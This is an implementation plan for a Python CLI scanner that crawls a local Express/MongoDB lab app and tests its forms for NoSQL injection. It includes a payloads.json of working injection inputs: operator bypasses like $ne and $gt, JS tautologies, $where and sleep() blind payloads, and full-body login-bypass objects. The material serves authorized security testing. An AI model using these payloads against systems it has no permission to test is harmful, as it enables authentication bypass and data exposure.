Skip to content

Latest commit

 

History

History
975 lines (780 loc) · 49.2 KB

File metadata and controls

975 lines (780 loc) · 49.2 KB

NoSQL Injection CLI Scanner — Implementation Plan

Document Control

Field Value
Project NoSQL Injection CLI Scanner
Artifact Implementation Plan v1.0
Runtime Python 3.10+ (CPython), Windows / Linux / macOS
Stack argparse, requests, beautifulsoup4, rich, urllib3
Target App Custom Express/MongoDB app at website/ (localhost:3000)
Version 1.0 Planning Baseline
Date 2026-04-22

1. Vision and Outcome

We are building a Python CLI vulnerability scanner that automatically detects NoSQL injection flaws in MongoDB-backed web applications. The tool crawls a target website, discovers forms and API inputs, injects categorized NoSQL payloads (operator injection, regex extraction, logic bypasses) via both URL-encoded and JSON content types, and analyzes server responses to flag authentication bypasses, data leaks, and abnormal behaviors. This matters because MongoDB/Node.js stacks are widely deployed yet under-tested for injection flaws — this tool gives security researchers and developers a repeatable, automated way to audit their applications without manual curl testing.

User Flow

  1. Invoke — User runs python scanner.py --url http://localhost:3000 --max-depth 2 --output report.json --verbose from the cli/ directory.
  2. Validate — Scanner validates the URL, confirms the target is reachable, and establishes a baseline response fingerprint.
  3. Crawl — Scanner crawls internal pages within scope (up to --max-depth), collecting all discoverable HTML forms and their field structures.
  4. Inject — For each discovered form, payloads from payloads.json are injected into each field. Each payload is tested as both application/x-www-form-urlencoded and application/json where applicable.
  5. Analyze — Response analysis engine compares each response against the baseline, checking for status code changes, body content anomalies (e.g., "ok": true where "ok": false was expected), redirect behavior changes, and timing anomalies.
  6. Report — Scanner writes a structured JSON report and prints a colorized console summary with severity-scored findings.

2. Scope

In Scope (V1)

  • CLI argument parsing with argparse (--url, --max-depth, --timeout, --output, --verbose, --content-type, --delay)
  • URL validation and normalization (scheme enforcement, trailing-slash normalization)
  • Recursive page crawler with scope restriction (same-origin only) and configurable depth limit
  • HTML form discovery via BeautifulSoup — extracting action, method, input name/type attributes
  • Curated payloads.json with categorized vectors:
    • Operator injection: $ne, $gt, $regex, $in, $nin, $exists
    • Logic bypass: ' || 1==1, $where clauses
    • Time-based blind: sleep() payloads for timing side-channel detection
    • Derived from nosqli_wordlist.txt and the NoSQL Injection reference guide
  • Dual content-type testing: each payload submitted as both application/x-www-form-urlencoded and application/json
  • Response analysis heuristics:
    • Status code delta — 401 → 200 indicates bypass
    • Body content matching"ok": true, "Login successful", "count": changes
    • Redirect detection — 3xx or client-side redirect indicators
    • Timing analysis — response time > baseline + threshold indicates blind injection
    • Error signature detection — MongoDB/Mongoose error strings in response body
  • Severity scoring: Critical / High / Medium / Low / Info
  • Structured JSON report matching the contract in README.md
  • Colorized console summary via rich
  • Session-aware scanning (cookie jar persistence across requests to handle authenticated flows)
  • Logging with Python logging module at configurable verbosity levels
  • Robust error handling: timeouts, connection errors, malformed HTML, unreachable targets

Out of Scope (V1)

  • Automated data exploitation/dumping — the scanner detects and proves, but does not extract database contents beyond proof-of-concept confirmation
  • Server-Side JavaScript Injection (SSJI) evaluation$where payloads are included for detection, but arbitrary JS execution chains are not evaluated
  • GUI/Web interface — CLI only
  • Non-MongoDB databases — no CouchDB, Cassandra, or Redis-specific payloads
  • Proxy/interceptor integration — no Burp Suite or ZAP plugin mode
  • Distributed/multi-threaded scanning — single-threaded sequential scanning for V1
  • Custom authentication flows — scanner supports cookie-based sessions; OAuth/JWT/SAML are deferred

3. Quality Bar and Success Criteria

Functional Success

  • Scanner correctly identifies the known auth bypass on POST /api/vuln/login when injecting {"username": {"$gt": ""}, "password": {"$gt": ""}} — rated Critical/High
  • Scanner correctly identifies search injection on GET/POST /api/vuln/search when injecting operator objects — rated High/Medium
  • Scanner produces zero false positives when run against POST /api/secure/login and GET /api/secure/search (secure mode rejects all operator payloads with 400)
  • Scanner discovers at least the login form on /login.html and search form on /search.html via crawling
  • JSON report output validates against the report contract defined in README.md

Security Success

  • Scanner never stores or leaks target credentials beyond the scan session
  • All payloads are loaded from the external payloads.json file — no hardcoded attack strings in source
  • Scanner includes a mandatory --i-agree-to-legal-terms flag or disclaimer prompt before scanning non-localhost targets
  • No dependency with known CVEs at time of release

Performance Success

  • Full scan of the target app (2 pages, ~30 payloads × 2 content types × 2 forms) completes in under 60 seconds with default timeout (5s per request)
  • Individual request timeout default: 5 seconds
  • Memory usage under 100MB for any scan

Operability Success

  • pip install -r requirements.txt from a clean venv succeeds on Python 3.10+
  • python scanner.py --help prints complete usage documentation
  • Scanner exits with code 0 on success, 1 on scan errors, 2 on argument errors

UX/DX Success

  • Console output uses color-coded severity levels (red=Critical, orange=High, yellow=Medium, cyan=Low)
  • Progress indicators show current phase (Crawling → Injecting → Analyzing → Reporting)
  • Verbose mode logs every request/response pair for lab analysis and debugging

4. Target Architecture

4.1 Core Components

1. CLI Entry Point (scanner.py) The main entry point. Parses arguments via argparse, orchestrates the scan pipeline (validate → crawl → inject → analyze → report), and handles top-level error boundaries. Owns the decision of which phases to run and in what order.

2. URL Validator (core/validator.py) Validates and normalizes the target URL. Ensures scheme is http/https, resolves trailing slashes, and performs a reachability check (HEAD request) before the scan begins. Returns a canonical base URL for the crawler.

3. Web Crawler (core/crawler.py) Recursively discovers pages within the target's origin up to --max-depth. Maintains a visited-URL set to avoid cycles. For each discovered page, delegates to the form parser. Uses requests.Session for cookie persistence. Respects robots.txt as a courtesy (configurable).

4. Form Parser (core/form_parser.py) Uses BeautifulSoup to extract all <form> elements from a page. For each form, captures: action URL (resolved to absolute), HTTP method, input field names and types, and any hidden fields. Returns structured FormTarget objects for the injection engine.

5. Payload Manager (core/payloads.py) Loads and categorizes payloads from payloads.json. Exposes payloads grouped by category (operator_injection, logic_bypass, regex_extraction, time_based, blind_bruteforce). Each payload entry includes: the payload value, a category tag, expected behavior description, and applicable content types.

6. Injection Engine (core/injector.py) Takes a FormTarget and a list of payloads. For each injectable field, substitutes the payload and submits the form. Tests each payload under both application/x-www-form-urlencoded and application/json content types. Records the full request/response pair for analysis. Supports configurable inter-request delay.

7. Response Analyzer (core/analyzer.py) Compares each injection response against a baseline response (captured by submitting the form with benign data). Implements heuristic checks: status code delta, body content keyword matching, response length delta, redirect detection, timing anomaly detection (for time-based blind), and MongoDB error string scanning. Assigns a severity and confidence score to each finding.

8. Report Generator (core/reporter.py) Collects all findings from the analyzer and produces: (a) a structured JSON report file matching the contract in README.md, and (b) a colorized console summary table using rich. Includes scan metadata (target, start/end time, total forms/payloads tested, findings count by severity).

9. Utilities (core/utils.py) Shared helpers: logging configuration, URL resolution, timing utilities, constant definitions (e.g., known MongoDB error signatures), and the disclaimer/legal prompt.

4.2 Proposed Folder/Module Structure

cli/
├── scanner.py                  # Entry point — CLI argument parsing and pipeline orchestration
├── requirements.txt            # Python dependencies
├── payloads.json               # Categorized NoSQL injection payloads
├── core/
│   ├── __init__.py
│   ├── validator.py            # URL validation and reachability check
│   ├── crawler.py              # Recursive same-origin page crawler
│   ├── form_parser.py          # BeautifulSoup-based HTML form extractor
│   ├── payloads.py             # Payload loader and category manager
│   ├── injector.py             # Form submission engine (URL-encoded + JSON)
│   ├── analyzer.py             # Response comparison and heuristic scoring
│   ├── reporter.py             # JSON report writer + Rich console summary
│   ├── utils.py                # Shared helpers, constants, logging setup
│   └── models.py               # Data classes: FormTarget, Finding, ScanResult, Payload
├── references/
│   ├── NoSQL Injection.md      # Reference guide (existing)
│   └── nosqli_worlist.txt      # Raw wordlist (existing)
├── general plan.md             # Plan template (existing)
└── README.md                   # Usage documentation (existing)

5. Phase Plan

Phase 0 — Requirements and Risk Baseline

Goals: Confirm all requirements, validate the vulnerable target app is functional, and establish the development environment.

Work Packages:

  1. Verify Python 3.10+ is installed and create the virtual environment (python -m venv .venv)
  2. Populate requirements.txt with pinned versions: requests==2.32.*, beautifulsoup4==4.12.*, rich==13.*, urllib3==2.*
  3. Start the target website (cd website && npm install && node src/server.js) and confirm it responds on http://localhost:3000
  4. Manually verify the vulnerable endpoints still behave as documented in MODE_AUTH_FLOW_TEST_RESULTS.md:
    • POST /api/vuln/login with username[$ne]=&password[$ne]= → 200 + "ok": true
    • POST /api/vuln/login with legit creds → 200 + "ok": true
    • POST /api/vuln/login with wrong creds → 401 + "ok": false
    • POST /api/secure/login with password[$ne]= → 400 + "must be non-empty strings"
  5. Create the cli/core/ package directory with __init__.py
  6. Confirm payloads.json can be loaded and parsed (currently {}, will be populated in Phase 1)

Deliverables:

  • Working venv with all dependencies installed
  • Confirmed target app responses matching expected behavior
  • Empty cli/core/ package structure created

Exit Criteria:

  • pip install -r requirements.txt succeeds
  • Target app responds correctly to both legit and injection payloads
  • All team members have the same environment running

References: R1, R2, R3


Phase 1 — Foundation: Models, Payloads, and Utilities

Goals: Build the data layer and shared infrastructure that all other components depend on.

Work Packages:

  1. Create core/models.py — Define the following dataclasses:

    @dataclass
    class FormTarget:
        url: str              # Absolute action URL
        method: str           # GET or POST
        fields: list[dict]    # [{"name": "username", "type": "text"}, ...]
        page_url: str         # Page where the form was found
    
    @dataclass
    class Payload:
        value: Any            # The payload (string, dict, or list)
        category: str         # operator_injection | regex_extraction | logic_bypass | time_based | blind_bruteforce
        description: str      # Human-readable explanation
        content_types: list   # ["urlencoded", "json"] or subset
    
    @dataclass
    class Finding:
        severity: str         # critical | high | medium | low | info
        confidence: str       # confirmed | tentative | speculative
        endpoint: str         # e.g., /api/vuln/login
        form_page: str        # e.g., /login.html
        method: str           # POST, GET
        content_type: str     # The content type that triggered the finding
        payload: Any          # The exact payload that triggered it
        payload_category: str # Category from Payload
        evidence: str         # Human-readable evidence description
        baseline_status: int  # Expected status code
        actual_status: int    # Observed status code
        response_snippet: str # First 500 chars of response body
        response_time_ms: float
    
    @dataclass
    class ScanResult:
        target: str
        scan_start: str       # ISO 8601
        scan_end: str         # ISO 8601
        pages_crawled: int
        forms_discovered: int
        payloads_tested: int
        findings: list[Finding]
  2. Create core/utils.py — Implement:

    • setup_logging(verbose: bool) -> logging.Logger — configures root logger with Rich handler
    • resolve_url(base: str, relative: str) -> str — uses urllib.parse.urljoin
    • MONGODB_ERROR_SIGNATURES: list[str]["MongoError", "MongoServerError", "CastError", "ValidationError", "BSONTypeError", "$where", "mapReduce"]
    • SUCCESS_INDICATORS: list[str]['"ok": true', '"ok":true', '"Login successful"', '"message": "Login successful"']
    • FAILURE_INDICATORS: list[str]['"ok": false', '"ok":false', '"Invalid credentials"']
    • print_banner() — prints ASCII art tool name and version
  3. Populate payloads.json — Curate payloads derived from nosqli_wordlist.txt and NoSQL Injection.md. Structure:

    {
      "operator_injection": [
        {
          "value": {"$ne": ""},
          "description": "Not-equal empty string bypass",
          "content_types": ["urlencoded", "json"]
        },
        {
          "value": {"$gt": ""},
          "description": "Greater-than empty string bypass",
          "content_types": ["urlencoded", "json"]
        },
        {
          "value": {"$ne": null},
          "description": "Not-equal null bypass",
          "content_types": ["json"]
        },
        {
          "value": {"$regex": ".*"},
          "description": "Wildcard regex match-all",
          "content_types": ["json"]
        },
        {
          "value": {"$regex": "^a"},
          "description": "Regex prefix extraction probe (letter a)",
          "content_types": ["json"]
        },
        {
          "value": {"$exists": true},
          "description": "Field existence check bypass",
          "content_types": ["json"]
        },
        {
          "value": {"$in": ["admin", "root", "administrator", "Admin"]},
          "description": "In-list common username brute force",
          "content_types": ["json"]
        },
        {
          "value": {"$nin": ["impossible_value_12345"]},
          "description": "Not-in exclusion bypass",
          "content_types": ["json"]
        }
      ],
      "logic_bypass": [
        {
          "value": "' || 1==1",
          "description": "JS logical OR tautology",
          "content_types": ["urlencoded"]
        },
        {
          "value": "' || 1==1//",
          "description": "JS logical OR tautology with comment",
          "content_types": ["urlencoded"]
        },
        {
          "value": "' || 1==1%00",
          "description": "JS logical OR with null byte terminator",
          "content_types": ["urlencoded"]
        },
        {
          "value": "true, $where: '1 == 1'",
          "description": "$where clause injection via string concatenation",
          "content_types": ["urlencoded"]
        },
        {
          "value": ", $where: '1 == 1'",
          "description": "$where clause injection (comma prefix)",
          "content_types": ["urlencoded"]
        }
      ],
      "regex_extraction": [
        {
          "value": {"$regex": "^admin"},
          "description": "Regex probe — starts with admin",
          "content_types": ["json"]
        },
        {
          "value": {"$regex": "^.{1,50}$"},
          "description": "Regex probe — match strings 1-50 chars",
          "content_types": ["json"]
        }
      ],
      "time_based": [
        {
          "value": {"$where": "sleep(3000)"},
          "description": "Time-based blind — 3 second sleep",
          "content_types": ["json"],
          "expected_delay_ms": 3000
        },
        {
          "value": "';sleep(3000);",
          "description": "JS injection sleep via string break",
          "content_types": ["urlencoded"],
          "expected_delay_ms": 3000
        }
      ],
      "auth_bypass_combo": [
        {
          "value": {"username": {"$gt": ""}, "password": {"$gt": ""}},
          "description": "Full auth bypass — both fields gt empty",
          "content_types": ["json"],
          "is_full_body": true
        },
        {
          "value": {"username": {"$ne": null}, "password": {"$ne": null}},
          "description": "Full auth bypass — both fields ne null",
          "content_types": ["json"],
          "is_full_body": true
        },
        {
          "value": {"username": {"$ne": "foo"}, "password": {"$ne": "bar"}},
          "description": "Full auth bypass — both fields ne arbitrary",
          "content_types": ["json"],
          "is_full_body": true
        },
        {
          "value": {"username": {"$in": ["admin", "root", "administrator"]}, "password": {"$gt": ""}},
          "description": "Admin brute force via $in + $gt bypass",
          "content_types": ["json"],
          "is_full_body": true
        }
      ]
    }
  4. Create core/payloads.py — Implement:

    • load_payloads(filepath: str) -> dict[str, list[Payload]] — loads and validates payloads.json, returns categorized Payload objects
    • get_all_payloads(categories: dict) -> list[Payload] — flattens all categories into a single list
    • get_payloads_for_content_type(payloads: list[Payload], content_type: str) -> list[Payload] — filters payloads by content type

Deliverables:

  • core/models.py with all dataclasses
  • core/utils.py with logging, URL helpers, and constants
  • core/payloads.py with loader and filter functions
  • Populated payloads.json with 20+ categorized payloads

Exit Criteria:

  • from core.models import FormTarget, Payload, Finding, ScanResult works
  • load_payloads("payloads.json") returns populated payload categories
  • All constants are centrally defined and importable

References: R1, R2, R3


Phase 2 — URL Validation and Web Crawler

Goals: Implement the input validation layer and recursive page crawler that discovers all forms within the target scope.

Work Packages:

  1. Create core/validator.py — Implement:

    • validate_url(url: str) -> str — checks scheme is http/https, normalizes trailing slash, validates hostname format. Raises ValueError on invalid input.
    • check_reachability(url: str, timeout: int) -> tuple[bool, int, float] — sends HEAD request, returns (reachable, status_code, response_time_ms). Handles ConnectionError, Timeout, TooManyRedirects.
    • get_base_origin(url: str) -> str — extracts scheme://host:port for scope comparison.
  2. Create core/crawler.py — Implement:

    • Crawler class with:
      • __init__(self, base_url: str, max_depth: int, timeout: int, session: requests.Session)
      • crawl(self) -> list[CrawledPage] — BFS/DFS traversal starting from base_url
      • _fetch_page(self, url: str) -> str | None — GET request, return HTML body or None on error
      • _extract_links(self, html: str, page_url: str) -> list[str] — find all <a href> links, resolve to absolute, filter to same origin
      • _is_in_scope(self, url: str) -> bool — checks if URL shares the same origin as base
    • CrawledPage dataclass: url: str, html: str, depth: int
    • Visited-URL deduplication via set
    • Skip non-HTML resources (check Content-Type header before parsing)
    • Log each discovered page at INFO level

Deliverables:

  • core/validator.py — URL validation and reachability
  • core/crawler.py — recursive crawler with scope enforcement

Exit Criteria:

  • validate_url("http://localhost:3000") returns normalized URL
  • validate_url("not-a-url") raises ValueError
  • Crawler("http://localhost:3000", max_depth=2, ...).crawl() discovers at least /, /login.html, /search.html
  • Crawler does not visit external links or non-HTML resources

References: R1, R4


Phase 3 — Form Discovery and Parsing

Goals: Extract all injectable form targets from crawled pages.

Work Packages:

  1. Create core/form_parser.py — Implement:

    • parse_forms(html: str, page_url: str) -> list[FormTarget] — uses BeautifulSoup to find all <form> tags
    • For each form, extract:
      • action attribute → resolve to absolute URL using page_url as base
      • method attribute → default to GET if missing, normalize to uppercase
      • All <input>, <textarea>, <select> elements → capture name, type, value (default value if present)
      • Hidden fields are preserved (they may contain CSRF tokens or mode selectors)
    • Return list of FormTarget objects
    • Handle edge cases: forms with no action (submit to current page), forms with empty method, nested forms (invalid HTML but handle gracefully)
  2. Integration test: Run crawler → form parser pipeline against http://localhost:3000 and verify:

    • Login form discovered with fields: username (text), password (password), send-json (checkbox)
    • Search form discovered with fields: query (text), send-json (checkbox)
    • Action URLs resolve correctly (/api/vuln/login, /api/vuln/search or relative)

Important

The login and search forms in the target app submit via JavaScript (login.js, search.js), not via standard HTML form actions. The <form> tags may have no action attribute, or the action may not match the actual API endpoint. The form parser should extract what it finds from the HTML, but the injection engine (Phase 4) must allow manual endpoint override via CLI flag (--endpoints) or fall back to discovered API path inference by examining the JS files for fetch/XHR URLs.

Deliverables:

  • core/form_parser.py — BeautifulSoup-based form extractor
  • Verified form discovery against the live target

Exit Criteria:

  • parse_forms(html, "http://localhost:3000/login.html") returns at least one FormTarget with username and password fields
  • All form field names are correctly captured
  • Absolute action URLs are correctly resolved

References: R1, R4


Phase 4 — Injection Engine

Goals: Build the core scanning engine that submits payloads to discovered forms and records responses.

Work Packages:

  1. Create core/injector.py — Implement:

    • Injector class with:
      • __init__(self, session: requests.Session, timeout: int, delay: float, verbose: bool)
      • establish_baseline(self, form: FormTarget) -> BaselineResponse — submit the form with benign data (empty strings or placeholder values) to capture the "normal" response (status code, body length, key content markers, response time)
      • inject_form(self, form: FormTarget, payloads: list[Payload]) -> list[InjectionResult] — for each payload:
        1. For each injectable field (skip checkboxes, hidden fields with fixed values)
        2. For each applicable content type (urlencoded, json):
          • Build the request body with the payload substituted into the current field, benign values in other fields
          • For is_full_body payloads (auth_bypass_combo), use the payload as the entire request body
          • Submit and record: status code, response body, response headers, response time, any cookies set
          • Apply inter-request delay if configured
      • _build_urlencoded_body(self, form: FormTarget, field_name: str, payload_value) -> dict — for operator payloads like {"$ne": ""}, encode as field_name[$ne]=
      • _build_json_body(self, form: FormTarget, field_name: str, payload_value) -> dict — substitute payload object directly into JSON body
    • BaselineResponse dataclass: status_code, body_length, body_hash, response_time_ms, key_markers (list of found SUCCESS/FAILURE indicators)
    • InjectionResult dataclass: form, field_name, payload, content_type, status_code, body, headers, response_time_ms, cookies
  2. URL-encoded operator encoding logic: When sending operator injection payloads via urlencoded content type, the injector must format them correctly for Express's qs parser:

    • {"$ne": ""}field_name[$ne]=
    • {"$gt": ""}field_name[$gt]=
    • {"$regex": ".*"}field_name[$regex]=.*
    • {"$in": ["admin", "root"]}field_name[$in][]=admin&field_name[$in][]=root
  3. Session cookie management: The injector must use a shared requests.Session so that if a payload achieves login (sets a session cookie), subsequent requests to authenticated endpoints (like /api/vuln/search) can be tested in the authenticated context. The injector should also support resetting the session between payload groups to avoid cross-contamination (logout + new session).

Deliverables:

  • core/injector.py — injection engine with dual content-type support
  • Baseline capture and session management

Exit Criteria:

  • Injector correctly sends POST /api/vuln/login with {"username": {"$gt": ""}, "password": {"$gt": ""}} as JSON and receives 200
  • Injector correctly sends POST /api/vuln/login with username[$ne]=&password[$ne]= as urlencoded and receives 200
  • Injector correctly sends the same payloads to /api/secure/login and receives 400
  • Baseline response for login form correctly captures 401 status with "ok": false
  • Inter-request delay is respected

References: R1, R2, R3, R5


Phase 5 — Response Analysis and Severity Scoring

Goals: Implement the intelligence layer that determines whether an injection response indicates a vulnerability.

Work Packages:

  1. Create core/analyzer.py — Implement:

    • ResponseAnalyzer class with:
      • __init__(self, baseline: BaselineResponse, time_threshold_ms: float = 2500)
      • analyze(self, result: InjectionResult) -> Finding | None — runs all heuristic checks and returns a Finding if any trigger, or None if benign
      • _check_status_code_delta(self, result) -> tuple[bool, str] — returns True if status changed from failure (4xx) to success (2xx/3xx). Evidence: "Status changed from {baseline} to {actual}"
      • _check_auth_bypass(self, result) -> tuple[bool, str] — searches response body for SUCCESS_INDICATORS when baseline contained FAILURE_INDICATORS. Evidence: "Auth bypass detected: response contains 'Login successful'"
      • _check_data_leak(self, result) -> tuple[bool, str] — checks if response body contains significantly more data than baseline (body length ratio > 1.5x, or new JSON keys like "results", "count" appear). Evidence: "Data leak: response body {X}x larger than baseline"
      • _check_error_signature(self, result) -> tuple[bool, str] — scans response body for MONGODB_ERROR_SIGNATURES. Evidence: "MongoDB error exposed: {matched_signature}"
      • _check_timing_anomaly(self, result) -> tuple[bool, str] — if payload is time_based category and response_time > baseline + expected_delay * 0.8, flag. Evidence: "Time-based blind: response took {X}ms (baseline: {Y}ms)"
      • _check_redirect_change(self, result) -> tuple[bool, str] — if baseline had no redirect but injection response has 3xx or Location header. Evidence: "Unexpected redirect to {location}"
  2. Severity scoring logic:

    Condition Severity Confidence
    Auth bypass confirmed (status 401→200 + success indicator in body) critical confirmed
    Auth bypass partial (status change but no success indicator) high tentative
    Data leak detected (significant body length increase) high confirmed
    MongoDB error exposed medium confirmed
    Time-based blind (timing confirms) high tentative
    Redirect change observed medium speculative
    Status code change only (no other indicators) low speculative
  3. Finding deduplication: If the same endpoint+field combination triggers on multiple similar payloads (e.g., $ne and $gt both bypass login), keep the finding with the highest severity/confidence and note the others as corroborating evidence.

Deliverables:

  • core/analyzer.py — multi-heuristic response analyzer with severity scoring
  • Finding deduplication logic

Exit Criteria:

  • Analyzer correctly flags the $ne/$gt auth bypass on /api/vuln/login as critical / confirmed
  • Analyzer correctly produces no findings for the same payloads against /api/secure/login
  • Time-based analysis correctly flags delayed responses (tested with time_based payloads)
  • MongoDB error exposure correctly detected when errors leak in response body

References: R1, R2, R5


Phase 6 — Report Generation and Console Output

Goals: Produce the final JSON report and a professional console summary.

Work Packages:

  1. Create core/reporter.py — Implement:

    • generate_json_report(scan_result: ScanResult, output_path: str) — writes JSON matching the contract:
      {
        "target": "http://localhost:3000",
        "scan_time": "2026-04-22T10:15:00Z",
        "scan_duration_seconds": 42,
        "summary": {
          "pages_crawled": 3,
          "forms_tested": 2,
          "payloads_tested": 48,
          "potential_findings": 4,
          "by_severity": {
            "critical": 1,
            "high": 2,
            "medium": 1,
            "low": 0,
            "info": 0
          }
        },
        "findings": [ ... ]
      }
    • print_console_summary(scan_result: ScanResult) — uses rich to display:
      • Header banner with scan metadata
      • Summary statistics table
      • Findings table with columns: Severity, Endpoint, Payload Category, Evidence, Confidence
      • Color-coded severity (Critical=red bold, High=red, Medium=yellow, Low=cyan, Info=dim)
      • Footer with report file path
  2. Verbose output mode: When --verbose is active, print each request/response pair as it happens (method, URL, content-type, payload, status code, response time, first 200 chars of body).

Deliverables:

  • core/reporter.py — JSON file writer + Rich console table
  • Verbose request/response logging

Exit Criteria:

  • JSON report validates against the contract schema
  • Console output is readable, color-coded, and includes all findings
  • Verbose mode logs every request/response pair with timing

References: R1, R6


Phase 7 — CLI Entry Point and Pipeline Integration

Goals: Wire everything together in scanner.py and implement the full scan pipeline.

Work Packages:

  1. Implement scanner.py — Full argument parser and orchestration:

    usage: scanner.py [-h] --url URL [--max-depth N] [--timeout SECS]
                      [--delay SECS] [--output FILE] [--verbose]
                      [--content-type {both,urlencoded,json}]
                      [--endpoints ENDPOINT [ENDPOINT ...]]
                      [--categories CATEGORY [CATEGORY ...]]
    

    Arguments:

    • --url (required): Target base URL
    • --max-depth (default: 2): Crawl depth limit
    • --timeout (default: 5): Per-request timeout in seconds
    • --delay (default: 0.1): Delay between injection requests in seconds
    • --output (default: report.json): Output report file path
    • --verbose / -v: Enable verbose request/response logging
    • --content-type (default: both): Which content types to test (both, urlencoded, json)
    • --endpoints: Manual endpoint override — skip crawling and inject directly into these endpoints (e.g., POST:/api/vuln/login:username,password)
    • --categories: Filter payload categories (e.g., operator_injection time_based)
  2. Scan pipeline in main():

    def main():
        args = parse_args()
        logger = setup_logging(args.verbose)
        print_banner()
    
        # Phase 1: Validate
        base_url = validate_url(args.url)
        reachable, status, rtt = check_reachability(base_url, args.timeout)
        if not reachable:
            logger.error(f"Target unreachable: {base_url}")
            sys.exit(1)
    
        # Phase 2: Load payloads
        payloads = load_payloads("payloads.json")
        if args.categories:
            payloads = {k: v for k, v in payloads.items() if k in args.categories}
    
        # Phase 3: Discover forms
        session = requests.Session()
        if args.endpoints:
            forms = parse_manual_endpoints(args.endpoints)
        else:
            crawler = Crawler(base_url, args.max_depth, args.timeout, session)
            pages = crawler.crawl()
            forms = []
            for page in pages:
                forms.extend(parse_forms(page.html, page.url))
    
        # Phase 4: Inject and analyze
        injector = Injector(session, args.timeout, args.delay, args.verbose)
        analyzer_findings = []
        all_payloads = get_all_payloads(payloads)
    
        for form in forms:
            baseline = injector.establish_baseline(form)
            results = injector.inject_form(form, all_payloads)
            response_analyzer = ResponseAnalyzer(baseline)
            for result in results:
                finding = response_analyzer.analyze(result)
                if finding:
                    analyzer_findings.append(finding)
    
        # Phase 5: Report
        scan_result = ScanResult(
            target=base_url,
            scan_start=start_time,
            scan_end=datetime.utcnow().isoformat(),
            pages_crawled=len(pages),
            forms_discovered=len(forms),
            payloads_tested=total_injections,
            findings=deduplicate_findings(analyzer_findings)
        )
        generate_json_report(scan_result, args.output)
        print_console_summary(scan_result)
  3. Error handling wrapper: Wrap the entire pipeline in try/except. Handle KeyboardInterrupt (print partial results), ConnectionError (retry once then fail), and unexpected errors (log traceback, exit 1).

  4. Exit codes: 0 = success (scan completed, findings or not), 1 = scan error (unreachable target, etc.), 2 = argument error.

Deliverables:

  • Complete scanner.py with argument parsing and pipeline orchestration
  • Manual endpoint mode (--endpoints)
  • Error handling and exit codes

Exit Criteria:

  • python scanner.py --help prints full usage
  • python scanner.py --url http://localhost:3000 --output report.json completes a full scan and produces a valid report
  • python scanner.py --url http://localhost:3000 --endpoints "POST:/api/vuln/login:username,password" --verbose scans only the login endpoint
  • Scanner exits with code 2 on bad arguments, code 1 on connection failure

References: R1, R4


Phase 8 — Testing and Validation

Goals: Validate the scanner produces correct results against both vulnerable and secure flows.

Work Packages:

  1. Validate against vulnerable flow:

    • Run full scan against http://localhost:3000 (vulnerable mode endpoints)
    • Confirm the report contains:
      • At least one critical finding for auth bypass on /api/vuln/login
      • At least one high finding for search injection on /api/vuln/search
    • Verify payloads that triggered include: $ne, $gt, $regex operator injections
    • Verify evidence descriptions are clear and actionable
  2. Validate against secure flow:

    • Run scan with --endpoints "POST:/api/secure/login:username,password" "POST:/api/secure/search:query"
    • Confirm the report contains zero findings (secure endpoints reject all operator payloads with 400)
    • Verify no false positives from timing noise or status code coincidences
  3. Edge case testing:

    • Test against unreachable URL → clean error message, exit code 1
    • Test with --timeout 0.001 → timeout handling works gracefully
    • Test with empty payloads.json → scanner reports no payloads to test
    • Test with --max-depth 0 → scanner tests only the root page
    • Test with malformed HTML target → parser handles gracefully
  4. Performance validation:

    • Full scan completes in under 60 seconds
    • Memory usage stays under 100MB

Deliverables:

  • Validated scan reports for both vulnerable and secure flows
  • Edge case test results documented
  • Performance benchmarks recorded

Exit Criteria:

  • Zero false negatives against the vulnerable flow (all known vulnerabilities detected)
  • Zero false positives against the secure flow
  • All edge cases handled gracefully without crashes

References: R1, R2, R5


Phase 9 — Packaging, Documentation, and Release Readiness

Goals: Polish the tool for release, finalize documentation, and ensure reproducible builds.

Work Packages:

  1. Finalize requirements.txt with exact pinned versions from the working venv (pip freeze)
  2. Update README.md with:
    • Installation instructions (venv setup, pip install)
    • Complete usage examples (basic scan, verbose mode, manual endpoints, category filtering)
    • Report output description with annotated example
    • Troubleshooting section (common errors and solutions)
  3. Add inline docstrings to all public functions and classes
  4. Add --version flag to the CLI
  5. Verify clean install: delete venv, recreate, install deps, run scan — everything works from scratch
  6. Create example reports: Include a sample example_report.json in the repo showing expected output

Deliverables:

  • Pinned requirements.txt
  • Updated README.md with full documentation
  • All modules documented with docstrings
  • Example report file
  • Clean install verified

Exit Criteria:

  • pip install -r requirements.txt && python scanner.py --help works from a fresh venv
  • README covers all CLI options and includes worked examples
  • Example report demonstrates the output format

References: R1, R6


6. Security Plan (Cross-Cutting)

6.1 Threat Model Checklist

  • Accidental scanning of production systems — user mistypes URL or forgets scope restrictions; could trigger WAF alerts or legal issues
  • Credential leakage in reports — session cookies or leaked credentials from successful bypasses appear in JSON reports
  • Payload self-injection — if scanner processes its own output or error messages contain payloads, could cause confusion
  • Dependency supply chain — compromised PyPI packages in the dependency chain
  • Excessive resource consumption — unbounded crawling or aggressive request rates could DoS the target

6.2 Mandatory Controls

  1. Legal disclaimer: Scanner prints a warning on startup: "This tool should only be used on systems you own or have explicit authorization to test."
  2. Localhost default scope: When targeting non-localhost origins, require explicit --confirm-external flag
  3. Report sanitization: Truncate response bodies in reports to 500 characters; strip Set-Cookie headers from stored responses
  4. Dependency pinning: All dependencies pinned to specific versions in requirements.txt
  5. Request rate limiting: Default 100ms delay between requests (--delay flag), with minimum floor of 50ms

6.3 Security Testing Controls

  • Run pip audit or safety check against installed dependencies before release
  • Manual review of all payloads in payloads.json to ensure they are detection-only (no destructive operations like db.dropDatabase())
  • Verify scanner does not follow redirects to external domains during crawling

7. Performance Plan (Cross-Cutting)

7.1 Key Levers

  • Request timeout — controls how long each injection attempt waits; directly impacts total scan time
  • Inter-request delay — prevents overwhelming the target; trades scan speed for target stability
  • Crawl depth — limits the number of pages discovered; deeper crawls find more forms but take longer
  • Payload count — more payloads = more thorough coverage but longer scans
  • Content-type testing — testing both urlencoded and JSON doubles the request count

7.2 Recommended Defaults

Setting Default Rationale
--timeout 5s Sufficient for localhost; prevents hanging on unresponsive endpoints
--delay 0.1s 100ms is respectful to target while keeping scan time reasonable
--max-depth 2 Captures most forms without deep-crawling large sites
--content-type both Maximizes detection coverage; necessary since Express handles both formats
Time-based threshold 2500ms Sleep payloads use 3000ms; 2500ms threshold accounts for network jitter

7.3 Runtime Safeguards

  • Per-request timeout: Hard timeout of --timeout seconds on every HTTP request; requests.Timeout caught and logged
  • Max pages cap: Crawler stops after 50 pages regardless of depth (prevents infinite crawling on large sites)
  • Max payloads per form: Warn if more than 100 payloads are being tested per form (likely misconfiguration)
